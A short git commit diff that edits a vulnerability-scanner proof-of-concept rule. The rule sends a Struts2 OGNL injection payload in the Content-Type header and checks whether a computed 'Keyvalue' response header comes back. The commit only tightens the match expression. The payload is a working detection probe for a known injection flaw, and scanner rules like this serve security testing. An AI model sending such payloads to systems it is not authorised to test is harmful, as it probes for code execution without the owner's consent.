更新mod库、编码、poc等

This commit is contained in:
shadow1ng
2021-05-06 11:39:58 +08:00
parent 402add56c7
commit 400f4373c9
3 changed files with 3 additions and 3 deletions
+1 -1
View File
@@ -9,7 +9,7 @@ rules:
Content-Type: ${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Keyvalue",{{r1}}*{{r2}})}.multipart/form-data
follow_redirects: true
expression: |
response.headers["Keyvalue"].contains(string(r1 * r2))
"Keyvalue" in response.headers && response.headers["Keyvalue"].contains(string(r1 * r2))
detail:
author: shadown1ng(https://github.com/shadown1ng)